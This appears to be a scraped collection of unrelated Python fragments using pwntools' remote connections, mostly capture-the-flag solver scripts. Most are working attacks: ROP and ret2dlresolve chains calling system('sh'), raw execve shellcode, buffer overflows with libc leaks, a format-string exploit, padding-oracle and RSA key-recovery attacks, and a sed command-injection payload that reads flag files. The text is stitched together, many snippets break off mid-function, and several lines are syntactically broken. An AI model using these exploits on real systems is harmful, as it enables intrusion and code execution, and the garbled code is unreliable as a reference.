def encrypt(m, r=1): conn = remote(HOST, PORT) conn.recv(1024) conn.sendline(str(m)) conn.recv(1024) conn.sendline(str(r)) ret = int(conn.recv(1024).split(" ")[1]) conn.close() return ret
def solve(): r = pwn.remote('', 21111) #while True: l = r.recvline().strip('\n') print(l) if(l.startswith('Enter a raw string (max. 32 bytes) that meets the following condition: hex(sha1(input))[0:6] ==')): hexedval = l.replace('Enter a raw string (max. 32 bytes) that meets the following condition: hex(sha1(input))[0:6] == ', '') payload = brute_sha1hex(hexedval) print ('Found payload={}'.format(payload)) r.writeline(payload) r.interactive()
def main(): import pwn host, port = "", 12002 r = pwn.remote(host, port) print r.readuntil("newline\n") while True: filename = r.readuntil("\n").strip("\n") print filename sol = solve(filename) print repr(sol) data = sol.encode("base64") print "Send this:" + data r.send(data)
def leaker(port): r = pwn.remote('localhost', port = port) d = r.recv(8) func = pwn.p32 if len(d) == 8: func = pwn.p64 def l(addr): r.send(pwn.flat(addr, func = func)) d = r.recv(8) if d is None or len(d) == 0: raise 'Peer closed connection' return d return l
def main(): #solve("65cb596908789372c2d6fbeb0ac3a0e3a1089039138711a016ec3994ad5c7f10") import pwn host, port = "", 12001 r = pwn.remote(host, port) print r.readuntil("newline\n") while True: filename = r.readuntil("\n").strip("\n") print filename sol = solve(filename) print repr(sol) data = sol.encode("base64") print "Send this:" + data r.send(data)
def main(): r = remote("", 14000) # r = process("") verify(r) r.readuntil("token: ") token = "d58c9a2aca58a3f2faf17ec5e7deaec6ZHSBHK6e" r.sendline(token) r.readuntil("P: ") P = r.readline().strip() P = int(P[2:-1], 16) r.readuntil('key:') b = getRandomNBitInteger(m/4) r.sendline(str(b)) r.readuntil("n: ") n = r.readline().strip() n = int(n[2:-1], 16) e = 0x10001 r.readuntil("e2: ") e2 = r.readline().strip() e2 = int(e2[2:], 16) r.readuntil("flag is: ") flag = r.readline().strip() flag = int(flag[2:-1], 16) r.close() print "n: ", hex(n) print "e: ", hex(e) print "e2: ", hex(e2) print "flag: ", hex(flag) print "=======start attack=====" t = get_bit(n, 1024, 1) print "t: ", hex(t) s = pi_sit_x1(o, t) print "s: ", hex(s) attack_spub = get_bit(s, m, 0) # if attack_spub == spub: # return True # else: # t += 1 # s = pi_sit_x1(o, t) # attack_spub = get_bit(s, m, 0) # if attack_spub == spub: # return True # else: # raw_input() # return False attack_spriv = pow(attack_spub, b, P) print "spub: ", hex(attack_spub) print "spriv: ", hex(attack_spriv)
def connect(url, sid=None, data=None, gdb=False): s = pwn.remote(REMOTE[0], REMOTE[1]) s.sendline(('GET /?' if not data else 'POST /?') + url + ' HTTP/1.1\r') s.sendline('Host: firmware.insomni.hack\r') s.sendline('Connection: keep-alive\r') if sid: s.sendline('Cookie: sid=' + sid + '\r') if data: s.sendline('Content-length: ' + str(len(data)) + '\r') s.sendline('\r') if data: import time time.sleep(1) s.send(data) return s
def __init__(self, user, passwd): prog = log.progress('Logging in...') p = remote('', 23) p.recvrepeat(0.1) # Login screen p.sendline(user + ',\r') p.recvrepeat(0.1) # Enter password p.sendline(passwd + '\r') if p.recvrepeat(1).find('您想刪除其他重複登入的連線嗎') != -1: p.sendline('n\r') p.recvuntil('請按任意鍵繼續') p.sendline('\r') p.recvrepeat(0.1) prog.success('Done') self.p = p self._board = None self._article = None
def rand_login(): s = remote(HOST, PORT) # login s.recvuntil(': ') user = choice(users.keys()) s.sendline(user) # pass # Sometimes log in correctly, otherwise use a random pass # Never login as clinton s.recvuntil(': ') pwd = users[user] if user != 'clinton' and random() < 0.25 else ''.join([choice(ascii) for j in xrange(randint(5, 50))]) s.sendline(pwd) s.recvall() s.close()
def exploit(ip, port, flag_id): pwn.context(timeout=10) dict_id = "".join(random.choice(string.ascii_letters) for i in range(30)) word = "".join(random.choice(string.ascii_letters) for i in range(30)) payload = "{} 0a DELIM s/{}/cat {}/e".format("".join(random.choice(string.ascii_letters) for i in range(30)), word, flag_id) r = pwn.remote(ip, port) r.recvline() r.send("dict {}\n".format(dict_id)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in payload).encode('hex') + '\n') r.recvline() r.send("translate {}\n".format(word)) r.send('quit\n') r.recvline() flagline = r.recvline() flag = re.match("s/secretik/(.*)/gi;", flagline).group(1) return {"FLAG" : flag}
def legit_login(): # Send it into lockdown s = remote(HOST, PORT) user = '******' # login s.recvuntil(': ') s.sendline(user) # pass s.recvuntil(': ') s.sendline(users[user]) # rekt s.recvuntil(': ') s.sendline('uhhh....China?') s.recvall() s.close()
def main(): r = remote("", 12000) # r = process("") verify(r) r.readuntil("token: ") token = "81755de89626aba8db7de4c93e658b68wBJekMIo" r.sendline(token) r.readuntil("n: ") n = r.readline().strip() n = int(n[2:-1], 16) r.readuntil("e: ") e = r.readline().strip() e = int(e[2:-1], 16) r.readuntil("is: ") enc_flag = r.readline().strip() enc_flag = int(enc_flag[2:-1], 16) print "We know:" print "n: ", hex(n) print "e: ", hex(e) print "flag: ", hex(enc_flag) print "=======Start Attack======" t = pi_b(e) print "get t = ", hex(t) phi_n = wiener_attack(t, n) try: u = invmod(t, phi_n) except: return False print "get u = ", hex(u) qq, pp = divide_pq(u*t, n) print "get p = ", hex(pp) print "get q = ", hex(qq) d = invmod(e, (qq-1)*(pp-1)) print "get d = ", hex(d) flag = pow(enc_flag, d, n) print "get flag: ", long_to_bytes(flag)
def solve(): r = pwn.remote('',4239) print(r.recvline()) result_string1 = ''; result_string2 = ''; while True: l1 = r.recvline().strip('\n') l2 = l1[1:10] parity = bit_xor(l2) print('InitialMessage={} WithoutStartStop={} Parity={}'.format(l1, l2, parity)) if(parity == 0): l3 = l2[0:8] unb = pwn.unbits(l3) print('Parity! Without parity bit={} unb={}'.format(l3, unb)) result_string1 = result_string1 + unb print(result_string1) result_string2 = result_string2 + l3; print(pwn.unbits(result_string2)) r.writeline('1') else: r.writeline('0')
def set_flag(ip, port, flag): pwn.context(timeout=10) flag_id = "".join(random.choice(string.ascii_letters) for i in range(30)) token = "".join(random.choice(string.ascii_letters) for i in range(30)) r = pwn.remote(ip, port) if not r.recvline() == 'Welcome to the NADMOZG translator service!\n': raise RuntimeError("Wrong banner") r.send("dict {}\n".format(flag_id)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n') if not r.recvline() == "Dictionary created\n": raise RuntimeError("Can't create dictionary") r.send("add secretik {}\n".format(flag)) if not r.recvline() == "Word saved!\n": raise RuntimeError("Can't store word") r.send("quit\n") if not r.recvall() == "Good bye!\n": raise RuntimeError("Wrong goodbye") return {"FLAG_ID" : flag_id, "TOKEN" : token}
def get_flag(ip, port, flag_id, token): pwn.context(timeout=10) r = pwn.remote(ip, port) if not r.recvline() == 'Welcome to the NADMOZG translator service!\n': raise RuntimeError("Wrong banner") r.send("dict {}\n".format(flag_id)) info = r.recvline() m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n') if not r.recvline() == 'Password ok!\n': raise RuntimeError("Can't load dictionary") if not r.recvline() == 'Dictionary loaded\n': raise RuntimeError("Can't load dictionary") r.send("translate secretik\n") flag = r.recvline().strip() if not flag != "secretik": raise RuntimeError("Flag not present or deleted") r.send("quit\n") if not r.recvall() == "Good bye!\n": raise RuntimeError("Wrong goodbye") return {"FLAG" : flag}
def main(): r = remote("", 13000) # r = process("") verify(r) r.readuntil("token: ") token = "d58c9a2aca58a3f2faf17ec5e7deaec6ZHSBHK6e" r.sendline(token) # r.readuntil("p4: ") # p_4 = r.readline().strip() # p_4 = int(p_4[2:-1], 16) r.readuntil("n: ") n = r.readline().strip() n = int(n[2:-1], 16) e = 0x10001 r.readuntil("e2: ") e2 = r.readline().strip() e2 = int(e2[2:], 16) print "n: ", hex(n) print "e: ", hex(e) print "e2: ", hex(e2) r.readuntil("flag is: ") flag = r.readline().strip() flag = int(flag[2:-1], 16) print "flag: ", hex(flag) print "=======start attack=====" n1 = get_bit(n, 3*k/8, 1) # print "n1: ", hex(n1) p4 = pi_b(get_bit(n1, 5*k/16, 0), 0) # if p_4 == p4: # return True # else: # return False print "p4: ", hex(p4) r.close()
import itertools from pwn import remote r = remote('', 31111) r.recvuntil('Input: ') while True: print r.recvuntil('Input: ') inp = r.recvline().strip().split(' ') print inp r.recvuntil('Answer: ') if int(inp[0]) < 11: print "Brute-forcing..." for p in itertools.permutations(inp[1:]): s = ''.join(p) if s == s[::-1]: print p r.sendline(' '.join(p)) break print r.recv()
#!/usr/bin/env python2 import pwn remote = True flag = "" last_char = "" index = 0 while last_char != '}': if remote: r = pwn.remote("", 5000) else: r = pwn.process("") # Header r.recvuntil("# Are you ready for the PITA?\n\n") # Binary select r.recvuntil("Choice: ") r.sendline("2") # start trace r.recvuntil("Choice: ") r.sendline("1") # add input constraint r.recvuntil("Choice: ") r.sendline("3") # r.sendline("input")
def run(host,port,cipher,size_block,error,verbose=True): cipher = cipher.upper() found = False valide_value = [] result = [] len_block = size_block*2 cipher_block = split_len(cipher, len_block) if len(cipher_block) == 1: print "[-] Abort there is only one block" sys.exit() #for each cipher_block s=pwn.remote(host,port) for block in reversed(range(1,len(cipher_block))): if len(cipher_block[block]) != len_block: print "[-] Abort length block doesn't match the size_block" break print "[+] Search value block : ", block, "\n" #for each byte of the block for i in range(0,size_block): # test each byte max 255 for ct_pos in range(0,256): # 1 xor 1 = 0 or valide padding need to be checked if ct_pos != i+1 or (len(valide_value) > 0 and int(valide_value[-1],16) == ct_pos): bk = block_search_byte(size_block, i, ct_pos, valide_value) bp = cipher_block[block-1] bc = block_padding(size_block, i) tmp = hex_xor(bk,bp) cb = hex_xor(tmp,bc).upper() up_cipher = cb + cipher_block[block] #time.sleep(0.5) # we call the oracle, our god s.sendline(up_cipher) pr=s.recv() if verbose == True: exe = re.findall('..',cb) discover = ('').join(exe[size_block-i:size_block]) current = ('').join(exe[size_block-i-1:size_block-i]) find_me = ('').join(exe[:-i-1]) sys.stdout.write("\r[+] Test [Byte %03i/256 - Block %d ]: \033[31m%s\033[33m%s\033[36m%s\033[0m \n" % (ct_pos, block, find_me, current, discover)) sys.stdout.flush() if pr.find(error)==-1: found = True #connection.close() # data analyse and insert in rigth order value = re.findall('..',bk) valide_value.insert(0,value[size_block-(i+1)]) if verbose == True: print '' print "[+] Block M_Byte : %s\n"% bk print "[+] Block C_{i-1}: %s\n"% bp print "[+] Block Padding: %s\n"% bc print '' bytes_found = ''.join(valide_value) if i == 0 and bytes_found.decode("hex") > hex(size_block) and block == len(cipher_block)-1: print "[-] Error decryption failed the padding is > "+str(size_block) sys.exit() print '\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1, "bytes :", bytes_found print '' break if found == False: # lets say padding is 01 for the last byte of the last block (the padding block) if len(cipher_block)-1 == block and i == 0: value = re.findall('..',bk) print value valide_value.insert(0,"01") if verbose == True: print '' print '[-] No padding found, but maybe the padding is length 01 :)' print "[+] Block M_Byte : %s"% bk print "[+] Block C_{i-1}: %s"% bp print "[+] Block Padding: %s"% bc print '' bytes_found = ''.join(valide_value) else: print "\n[-] Error decryption failed" result.insert(0, ''.join(valide_value)) hex_r = ''.join(result) print "[+] Partial Decrypted value (HEX):", hex_r.upper() padding = int(hex_r[len(hex_r)-2:len(hex_r)],16) print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex") sys.exit() found = False result.insert(0, ''.join(valide_value)) valide_value = [] print '' hex_r = ''.join(result) print "[+] Decrypted value (HEX):", hex_r.upper() padding = int(hex_r[len(hex_r)-2:len(hex_r)],16) print "[+] Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
import pwn import itertools import string import hashlib import sympy # perfect_power from Crypto.Util.number import isPrime #import Crypto.Util as Cr #import isPrime from Crypto.Util.number r = pwn.remote('',42738) print(r.recvline()) print(r.recvline()) bot_task = r.recvline() print(bot_task) print(r.recvline()) def bruteforce(charset, minlength, maxlength): return (''.join(candidate) for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i) for i in range(minlength, maxlength + 1))) key_part_2 = bot_task[12:34] print('part2=') print(key_part_2) sha_key = bot_task[52:84] print('sha_key_starts with') print(sha_key)
import pwn import sys if '--remote' in sys.argv: p = pwn.remote("", 10001) else: p = pwn.process("./orw") output = p.recv(len("Give my your shellcode:")) shellcode = open("shellcode.bin", 'rb').read() assert len(shellcode) < 200 p.send(shellcode) output = p.recvall() print(output)
import pwn pwn.context.binary = e = pwn.ELF("./resolve") # p = pwn.process("./resolve") p = pwn.remote("", 5435) if pwn.args.GDB: pwn.gdb.attach( p, gdbscript=""" break *(&main+29) continue """, ) r = pwn.ROP(e) d = pwn.Ret2dlresolvePayload(e, symbol="system", args=["sh"]) r.raw(0x401159) # ret gadget to align stack r.gets(d.data_addr) r.ret2dlresolve(d) payload ={0x10: r.chain()}) + b"\n" + d.payload p.sendline(payload) p.interactive()
#/usr/bin/python3 import pwn import sys e = pwn.ELF('chall') p = pwn.remote('', 9011) p.recvuntil("Data: ") pld = 0x100 * b"A" pld += pwn.p64(e.symbols['__stack_shadow'] + 0x100) p.sendline(pld) p.recvuntil("Data: ") pld = b"A" * 8 + pwn.p64(e.symbols['__stack_shadow'] + 16) pld += b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" p.sendline(pld) p.interactive() # zer0pts{1nt3rm3d14t3_pwn3r5_l1k3_2_0v3rwr1t3_s4v3d_RBP}
break def pwn_retrive_record(p, pwnstring): p.readuntil('What do you want to do?\n') p.sendline('3') p.readuntil('identifier: ') p.sendline(pwnstring) p.readuntil('you are: ') flag = p.readline() return flag def pwn_exit(p): p.readuntil('What do you want to do? ') p.sendline('4') p = pwn.remote(team_ip, team_port) #record_b64 = 'a:1:{i:0;O:6:"Record":1:{s:10:"identifier";s:6:' + base64.b64encode(queryid.encode("utf-8")) + ';}}' #pwn_store_record(p, pwnstring) #pwn_retrive_record(p, record_b64) pwn_python(p) pwn_exit(p)
#!/usr/bin/env python3 from pwn import process, remote from base64 import b64decode, b64encode # io = process(["python", ""]) io = remote("", 52171) io.sendlineafter(b"> ", b"1") io.sendlineafter(b"username: "******"") io.recvuntil(b"token: \n") enc = b64decode(io.recvline().strip()) iv1, iv2, ct = enc[:16], enc[16:32], enc[32:] def oracle(iv, block): enc = iv + iv2 + block io.sendlineafter(b"> ", b"2") io.sendlineafter(b"username: "******"l3o") io.sendlineafter(b"token: ", b64encode(enc)) r = io.recvlineS() return "Check your token again" not in r def oracle2(iv, block): enc = iv1 + iv + block io.sendlineafter(b"> ", b"2") io.sendlineafter(b"username: "******"l3o") io.sendlineafter(b"token: ", b64encode(enc)) r = io.recvlineS() return "Check your token again" not in r
import pwn import base64 import os print "Started!" r = pwn.remote("", 8000) l1 = r.recvall(timeout = 5) print(l1) print('START DECODING') decoded_str = base64.b64decode(l1) decoded_str2 = base64.b64decode(l1[::-1]) print ('DECODE FINISHED') # print(decoded_str) print('CREATING FILE') f = open('/root/Desktop/github/RT_CTF/csaw/sleeping_guard.png', 'wb') f.write(decoded_str) f.close() f = open('/root/Desktop/github/RT_CTF/csaw/sleeping_guard2.png', 'wb') f.write(decoded_str2) f.close()
vec = [] while length > _sage_const_0: vec = [num % q] + vec num //= q length -= _sage_const_1 return vec def to_mat(numlist): M = [] for i in numlist: M.append(to_vec(i, _sage_const_40)) return M CON = pwn.remote('', _sage_const_10000) resp = CON.recvuntil('key1:\n').decode().split('\n') n = int(resp[_sage_const_0]) e = _sage_const_65537 enc = int(resp[_sage_const_3]) for _ in range(_sage_const_14): CON.sendline(str(shiftf0(enc, _)).encode()) resp = CON.recvuntil('key1:\n').decode() print(_, resp) CON.sendline(str(shiftf0(enc, _ + _sage_const_1)).encode()) resp = CON.recvuntil('key2:\n').decode().split('\n') _res = resp[_sage_const_0][_sage_const_29:-_sage_const_1].split(',') res = [] for i in _res: res += [int(i)]
import base64 def shift(i, cs): plaintext = copy.copy(cs) for idx, c in enumerate(cs): v = ord(c) p = i + ord(c) if v >= 97 and v <= 122 and p > 122 or v >= 65 and v <= 90 and p > 90: plaintext[idx] = chr(p - 26) elif v >= 97 and v <= 122 or v >= 65 and v <= 90: plaintext[idx] = chr(p) return plaintext r = remote("", 10000) # round 1 xs = r.recv(timeout=0.1).decode("utf-8").split("\n") xs += r.recv(timeout=0.1).decode("utf-8").split("\n") # I don't know why it can't read in one time. A single line works in ipython. ss = [] for line in xs: print(line) if line[:2] == "m1" or line[:2] == "c1" or line[:2] == "c2": ss = ss + [line] ss = [line[5:] for line in ss] codebook = {} nShift = ord(ss[0][0]) - ord(ss[1][0]) if nShift < 0: nShift += 26 plaintext = list(ss[2])
def next_name(name): assert len(name) == 4 h = struct.unpack('<i', name)[0] ^ 0x12345678 while True: h += 1 name = struct.pack('<i', h ^ 0x12345678) if not (b' ' in name or b'\0' in name or b'\r' in name or b'\n' in name or b'\t' in name or b'\x0b' in name or b'\x0c' in name): break return name # r = process(['./exceptional']) r = remote('', 1337) # This is to point to a "fake" city with hash 0 so that its name is the flag: override_val = (0x7440 - 0x10 - 0x7120) // 4 to_override = struct.pack('<I', override_val ^ 0x12345678) # Build a tree with root val 2, one left child with val -1, and a long right # tail so that we overflow the stack upon searching it name = struct.pack('<I', 2 ^ 0x12345678) init = name name = next_name(name) names = [] for i in range(99): names.append(name) name = next_name(name)
def call_oracle(host,cookie,url,post,method,up_cipher): s=pwn.remote(host,51014) return s
#!/usr/bin/env python3 from itertools import product import pwn import itertools import hashlib pwn.context.log_level = 'DEBUG' IP, PORT = '', 1357 p = pwn.remote(IP, PORT) WIDTH, HEIGHT = 40, 20 def PoW(): target = p.recvline(keepends=False)[-33:-1].decode() assert len(target) == 32 for i in range(1 << 24): cand = i.to_bytes(3, 'big') if hashlib.md5(cand).hexdigest() == target:'PoW done') p.send(cand) break p.recvuntil('q, e : move focus(*)\nw, a, s, d : move player(p)\n') def recvMap(): Map = [] p.recvuntil('##########################################\n') for _ in range(HEIGHT): row = list(p.recvline(keepends=False).decode().strip('#')) Map.append(row)
def proof(END, HASH): table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' for i in table: for j in table: for k in table: for l in table: STR = i + j + k + l + END if sha256(STR.encode()).hexdigest() == HASH: print(i + j + k + l) return i + j + k + l pt = b"Hello, I'm a Bytedancer. Please give me the flag!" con = pwn.remote('', 30001) resp = con.recvuntil('> ').decode().split('\n')[-2] END = resp[12:40] HASH = resp[45:] con.sendline(proof(END, HASH).encode()) resp = con.recvuntil('> ').decode() con.sendline(('0' * 1024).encode()) resp = con.recvuntil('> ').decode() tmp = int(resp.split('\n')[1][32:34], 16) END = hex(tmp ^ 1)[2:].ljust(2, '0') DATA = ['0'] * 1022 + [END[0], END[1]] roundnum = '' TABLE = [50, 250, 450] for i in range(49): sleep(1) idx = TABLE[i % 3]
p.recvuntil(b"> ") p.sendline(b"A") p.recvuntil(b"> ") p.sendline(employee_name) def change_employee(employee_num, employee_new_name): p.recvuntil(b"> ") p.sendline(b"C") p.recvuntil(b"> ") p.sendline("%d" % employee_num) p.recvuntil(b"> ") p.sendline(employee_new_name) p = remote("", 8000) #p = process('./shadowstuck', env={"LD_PRELOAD":"./"}) libc = ELF('./') base_shadowstack = int(p.recvline().split(b'at ')[1][:-1], 16) print("[+] Shadowstack @ 0x%x" % base_shadowstack) add_employee("Mike") #0 fire_employee("Mike", b'a' * 0x10 + pack(base_shadowstack)[:-2]) leak = unpack(read_employee(1).ljust(8, b'\x00')) print("[+] Leak libc @ 0x%x" % leak) libc.address = leak - 159923 print("[+] Libc @ 0x%x" % libc.address)
#!/usr/bin/env python3 import pwn rem = pwn.remote('', 10101) libc = pwn.ELF('./') rem.recvuntil(':') rem.sendline('A' * 24) rem.recvline() libc_leak = b'\x00' + rem.recvuntil(':')[0:3] libc_leak = pwn.u32(libc_leak) leak_offset = libc.get_section_by_name('.got.plt').header.sh_addr libc_base = libc_leak - leak_offset system_addr = libc_base + libc.symbols[b'system'] bin_sh_addr = libc_base + list('/bin/sh\x00'))[0] num = 35 rem.sendline(str(num)) # 24 zeros for _ in range(24): rem.recvuntil(': ') rem.sendline('0') # canary rem.recvuntil(': ') rem.sendline('+') # system address
#!/usr/bin/env python3 from pwn import process, context, ELF, remote, u32, pause from fastpwn import pack, aslr, log from time import sleep from sys import argv if len(argv) > 1 and argv[1] == "-r": p = remote("", 10101) else: p = process('./dubblesort', env={'LD_LIBRARY_PATH': './'}) context.log_level = 'DEBUG' elf = ELF('./', checksec=False) mov_ebx_esp = pack.pk32(0x00000750) # mov ebx, [esp] ; ret n = lambda x: "A" * (x * 4) def s( i, un="" ): # s() func is an idea i got from reading r4j's exploit pocs, great job man :) if un: p.recvuntil(str(un)) p.sendline(str(i)) else: p.sendline(str(i)) #p.interactive() # reason for leak is due to strong not being null terminated # printf will continue to read and write until it reaches a null terminator. # 6 DWORDS is offset to .got.plt leak
#!/usr/bin/env python import pwn # attack = pwn.process('./bof') attack = pwn.remote('', 9000) payload = 52 * 'a' # print payload payload += pwn.p32(0xcafebabe) # attack.recvuntil("overflow me :") attack.send(payload) attack.interactive()
def oracle(self, data, **kwargs): somecookie = byte_to_hex(data) print(somecookie) if somecookie[32:] == "00000000000000000000000000000000": if somecookie[:30] == "000000000000000000000000000000": if somecookie[30:32] != '24': raise BadPaddingException() elif somecookie[:28] == "0000000000000000000000000000": if somecookie[28:30] != '6C': raise BadPaddingException() elif somecookie[:26] == "00000000000000000000000000": if somecookie[26:28] != 'AC': raise BadPaddingException() elif somecookie[:24] == "000000000000000000000000": if somecookie[24:26] != 'A7': raise BadPaddingException() elif somecookie[:22] == "0000000000000000000000": if somecookie[22:24] != '6F': raise BadPaddingException() elif somecookie[:20] == "00000000000000000000": if somecookie[20:22] != '19': raise BadPaddingException() elif somecookie[:18] == "000000000000000000": if somecookie[18:20] != '78': raise BadPaddingException() elif somecookie[:16] == "0000000000000000": if somecookie[16:18] != '62': raise BadPaddingException() elif somecookie[:14] == "00000000000000": if somecookie[14:16] != 'D7': raise BadPaddingException() elif somecookie[:12] == "000000000000": if somecookie[12:14] != 'D2': raise BadPaddingException() elif somecookie[:10] == "0000000000": if somecookie[10:12] != '8F': raise BadPaddingException() elif somecookie[:8] == "00000000": if somecookie[8:10] != '71': raise BadPaddingException() elif somecookie[:6] == "000000": if somecookie[6:8] != '27': raise BadPaddingException() elif somecookie[:4] == "0000": if somecookie[4:6] != 'AF': raise BadPaddingException() elif somecookie[:2] == "00": if somecookie[2:4] != '96': raise BadPaddingException() elif somecookie[0:2] != '32': raise BadPaddingException() elif somecookie[32:] == "5F96AE25728BD7D165701065ACA0612A": if somecookie[:30] == "000000000000000000000000000000": if somecookie[30:32] != '9B': raise BadPaddingException() elif somecookie[:28] == "0000000000000000000000000000": if somecookie[28:30] != '3D': raise BadPaddingException() elif somecookie[:26] == "00000000000000000000000000": if somecookie[26:28] != 'D4': raise BadPaddingException() elif somecookie[:24] == "000000000000000000000000": if somecookie[24:26] != '76': raise BadPaddingException() elif somecookie[:22] == "0000000000000000000000": if somecookie[22:24] != '63': raise BadPaddingException() elif somecookie[:20] == "00000000000000000000": if somecookie[20:22] != '41': raise BadPaddingException() elif somecookie[:18] == "000000000000000000": if somecookie[18:20] != 'C5': raise BadPaddingException() elif somecookie[:16] == "0000000000000000": if somecookie[16:18] != '9C': raise BadPaddingException() elif somecookie[:14] == "00000000000000": if somecookie[14:16] != '0B': raise BadPaddingException() elif somecookie[:12] == "000000000000": if somecookie[12:14] != '63': raise BadPaddingException() elif somecookie[:10] == "0000000000": if somecookie[10:12] != 'FD': raise BadPaddingException() elif somecookie[:8] == "00000000": if somecookie[8:10] != '80': raise BadPaddingException() #elif somecookie[:6] == "000000": # if somecookie[6:8] != '': # raise BadPaddingException() #elif somecookie[:4] == "0000": # if somecookie[4:6] != '': # raise BadPaddingException() #elif somecookie[:2] == "00": # if somecookie[2:4] != '': # raise BadPaddingException() #elif somecookie[0:2] != '': # raise BadPaddingException() #elif somecookie[32:] == "5F96AE25728BD7D165701065ACA0612A": #if somecookie[:30] == "000000000000000000000000000000": # if somecookie[30:32] != '9B': # raise BadPaddingException() #elif somecookie[:28] == "0000000000000000000000000000": # if somecookie[28:30] != '': # raise BadPaddingException() #elif somecookie[:26] == "00000000000000000000000000": # if somecookie[26:28] != '': # raise BadPaddingException() #elif somecookie[:24] == "000000000000000000000000": # if somecookie[24:26] != '': # raise BadPaddingException() #elif somecookie[:22] == "0000000000000000000000": # if somecookie[22:24] != '': # raise BadPaddingException() #elif somecookie[:20] == "00000000000000000000": # if somecookie[20:22] != '': # raise BadPaddingException() #elif somecookie[:18] == "000000000000000000": # if somecookie[18:20] != '': # raise BadPaddingException() #elif somecookie[:16] == "0000000000000000": # if somecookie[16:18] != '': # raise BadPaddingException() #elif somecookie[:14] == "00000000000000": # if somecookie[14:16] != '': # raise BadPaddingException() #elif somecookie[:12] == "000000000000": # if somecookie[12:14] != '': # raise BadPaddingException() #elif somecookie[:10] == "0000000000": # if somecookie[10:12] != '': # raise BadPaddingException() #elif somecookie[:8] == "00000000": # if somecookie[8:10] != '': # raise BadPaddingException() #elif somecookie[:6] == "000000": # if somecookie[6:8] != '': # raise BadPaddingException() #elif somecookie[:4] == "0000": # if somecookie[4:6] != '': # raise BadPaddingException() #elif somecookie[:2] == "00": # if somecookie[2:4] != '': # raise BadPaddingException() #elif somecookie[0:2] != '': # raise BadPaddingException() # TODO manage the lack of connection (n-retries when no connection are possibles) sock = pwn.remote(HOST, PORT) sock.sendafter('What is your cookie?\n', somecookie + '\n') buf = sock.recvall() resp.write(somecookie) resp.write(buf) if 'File "/problems/magic-padding-oracle_4_b6a931ed628517746b8ea88c8688f148/", line 20, in isvalidpad' in buf: raise Exception('Exception for this script') if 'invalid padding' in buf: raise BadPaddingException()'No padding exception raised on %r', somecookie)
from pwn import process, remote, p64 HOST = '' PORT = 1339 #io = process("./coal_mine", level="debug") io = remote(HOST, PORT, level='debug') io.recvuntil("fellow miner?\n") io.sendline("%15$p") io.recvuntil("Thanks, ") line = io.recvuntil("\n").strip() value = int(line, 16) value_str = "".join(chr(c) for c in p64(value)) io.recvuntil("mining today?") injection = 'A' * 40 + value_str + 8 * 'A' + '\x84\x12\x40\x00\x00\x00\x00\x00' io.sendline(injection) io.interactive()
# context.log_level = 'debug' N = 16 def to_block(b): return '{:0{width}x}'.format(b, width=N*2).decode('hex') def to_blocks(m): m += to_block(len(m)) padb = N - len(m) % N m += chr(padb) * padb blocks = [m[N*i : N*(i+1)] for i in range(len(m) // N)] return blocks # r = process('./') r = remote('', 64791) def e(m, mac = '0'): global r r.sendlineafter('> ', mac+'<|>'+m) return r.recvline() def test(cmd): global r echo = 'echo ' + '3' * (len(cmd)-5) p = 'tag ' + echo p1 = echo + '\x00' * (16-len(echo)) p2 = cmd + '\x00' * (16-len(cmd))
import pwn io = pwn.remote("localhost", 9000) if pwn.args.GDB: # breakpoints: # 0x4001d4: vuln.leave # 0x400138: after notvuln.write # 0x400165: after pwn.gdb.attach( target="chall", # Takes the youngest PID matching this name exe="./chall", gdbscript=""" break *0x4001d4 break *0x400138 break *0x400165 continue """, ) pwn.context.binary = elf = pwn.ELF("chall") stack_shadow = elf.symbols["__stack_shadow"] print(hex(stack_shadow)) """ Exploit: - Overwrite $rbp to set address for an arbitrary write - The address we'll use is `__stack_shadow` - Overwrite return address in `__stack_shadow` to control $rip - Jump into shellcode also stored on .bss, which is RWX """
def find_change(coins, value): coins = sorted(coins, reverse=True) coin_dict = {} for c in coins: if value % c == 0: coin_dict[c] = value / c return coin_dict else: coin_dict[c] = math.trunc(value/ float(c)) value -= (c * coin_dict[c]) coins = [1, 5, 10, 25, 50, 100, 500, 1000, 2000, 5000, 10000, 50000, 100000, 500000, 1000000] print ('Started') r = pwn.remote("", 8000) iteration_count = 0 while True: iteration_count += 1 print ('ROUND # %s'%(iteration_count)) l1 = r.recvline(timeout=2) print(l1) amount = int(round(float(str(l1.rstrip()[1:])) * 100)) print "Coins needed: " + str(amount) answer = find_change(coins, amount) for coin in sorted(coins, reverse=True): l2 = r.recvuntil(':', timeout=2) print(l2)
def benign(ip, port): def rand_str(): return ''.join(random.choice(string.ascii_letters) for i in range(30)) pwn.context(timeout=10) word_cnt = random.randrange(3, 10) words = [] for i in range(word_cnt): words.append([rand_str(), rand_str(), rand_str()]) dict_id1 = rand_str() pwd1 = rand_str() dict_id2 = rand_str() pwd2 = rand_str() str_to_translate = " ".join([x[0] for x in words]) str_after_translate_1 = " ".join([x[1] for x in words]) str_after_translate_2 = " ".join([x[2] for x in words]) str_without_translate = str_to_translate r = pwn.remote(ip, port) if not r.recvline() == 'Welcome to the NADMOZG translator service!\n': raise RuntimeError("Wrong banner") r.send("translate {}\n".format(str_to_translate)) if not r.recvline().strip() == str_without_translate: raise RuntimeError("Wrong default translation") r.send("dict {}\n".format(dict_id1)) info = r.recvline() m = re.match( "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info) if not m: raise RuntimeError("Wrong password request") byte = int(, 16) r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n') if not 